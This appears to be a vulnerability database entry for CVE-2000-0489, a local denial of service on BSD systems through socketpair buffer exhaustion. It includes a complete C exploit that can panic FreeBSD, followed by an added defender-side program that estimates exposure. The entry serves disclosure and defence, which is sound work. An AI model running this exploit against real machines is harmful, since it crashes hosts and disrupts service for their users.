Multiple Vendor setsockopt() Denial of Service Vulnerability

Vulnerability ID: 1105533
Vulnerability type: Other
Published: 1999-09-05
Updated: 2005-05-02
CVE ID: CVE-2000-0489
CNNVD-ID: CNNVD-199909-012
Platform: BSD
CVSS score: 2.1
|Vulnerability source
https://www.exploit-db.com/exploits/19488
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-012
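|Vulnerability details
FreeBSD, NetBSD and OpenBSD are vulnerable. An attacker can cause a denial of service by using the socketpair function to create a large number of socket pairs, setting large buffers on them with setsockopt, and writing data to them.
|Exploit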
source: http://www.securityfocus.com/bid/622/info

A denial of service attack exists that affects FreeBSD, NetBSD and OpenBSD, and potentially other operating systems based in some part on BSD. It is believed that all versions of these operating systems are vulnerable. The vulnerability is related to setting socket options regarding the size of the send and receive buffers on a socketpair. By setting them to certain values, and performing a write the size of the value the options have been set to, FreeBSD can be made to panic. NetBSD and OpenBSD do not panic, but network applications will stop responding.

Details behind why this happens have not been made available. 

#include <stdlib.h>     /* exit() */
#include <unistd.h>
#include <sys/socket.h>
#include <fcntl.h>

#define BUFFERSIZE 204800

int
main(void)
{
    int p[2], i;
    char crap[BUFFERSIZE];  /* contents are irrelevant, only the size matters */

    /* Loop until socketpair() fails (descriptor or kernel limit reached). */
    while (1)
    {
        if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
            break;
        /* Set send and receive buffers on both ends to BUFFERSIZE. */
        i = BUFFERSIZE;
        setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
        setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
        fcntl(p[0], F_SETFL, O_NONBLOCK);
        fcntl(p[1], F_SETFL, O_NONBLOCK);
        /* Write a full buffer in each direction; the descriptors stay open. */
        write(p[0], crap, BUFFERSIZE);
        write(p[1], crap, BUFFERSIZE);
    }
    exit(0);
}
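
A defender-side check for the conditions described above, added here as an example and not part of the original advisory: it opens one socketpair, requests the page's BUFFERSIZE, reads back what the kernel actually granted, and multiplies by the per-process descriptor limit to estimate how much socket-buffer space one unprivileged process could ask for. The function names are hypothetical, and the bound assumes every descriptor is a socket with both buffers full.

```c
#include <stdio.h>
#include <unistd.h>
#include <sys/resource.h>
#include <sys/socket.h>
#define REQUESTED 204800 /* same size as BUFFERSIZE on this page */

/* Ask for `want` bytes on option `opt`; return what the kernel granted, -1 on error. */
static long granted(int fd, int opt, int want)
{
    int got = 0;
    socklen_t len = sizeof(got);
    if (setsockopt(fd, SOL_SOCKET, opt, &want, sizeof(want)) == -1)
        return -1; /* request refused outright */
    if (getsockopt(fd, SOL_SOCKET, opt, &got, &len) == -1)
        return -1;
    return got;
}

/* Measure one AF_UNIX socketpair, then close it. Returns 0 on success. */
static int measure_pair(int want, long *snd, long *rcv)
{
    int p[2];
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    *snd = granted(p[0], SO_SNDBUF, want);
    *rcv = granted(p[0], SO_RCVBUF, want);
    close(p[0]);
    close(p[1]);
    return (*snd < 0 || *rcv < 0) ? -1 : 0;
}

/* Rough bound (assumption): every descriptor is a socket with both buffers full. */
static long long worst_case_bytes(long long fds, long snd, long rcv)
{
    if (fds < 0 || snd < 0 || rcv < 0)
        return -1; /* unknown or unlimited input: no finite bound */
    return fds * ((long long)snd + rcv);
}

int main(void)
{
    struct rlimit rl;
    long snd, rcv;
    if (measure_pair(REQUESTED, &snd, &rcv) || getrlimit(RLIMIT_NOFILE, &rl))
        return 1;
    long long fds = rl.rlim_cur == RLIM_INFINITY ? -1 : (long long)rl.rlim_cur;
    printf("granted SO_SNDBUF=%ld SO_RCVBUF=%ld, RLIMIT_NOFILE=%lld\n", snd, rcv, fds);
    printf("worst-case bytes per process: %lld\n", worst_case_bytes(fds, snd, rcv));
    return 0;
}
```

A result of -1 for the bound means the descriptor limit is unlimited, so the process has no per-process cap on the number of socketpairs it can hold open.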
|References

Source: XF
Name: bsd-setsockopt-dos
Link: http://xforce.iss.net/static/3298.php
Source: BUGTRAQ
Name: 19990826 Local DoS in FreeBSD
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BUGTRAQ
Name: 20000601 Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability - Mac OS X affected
Link: http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
Source: BID
Name: 622
Link: http://www.securityfocus.com/bid/622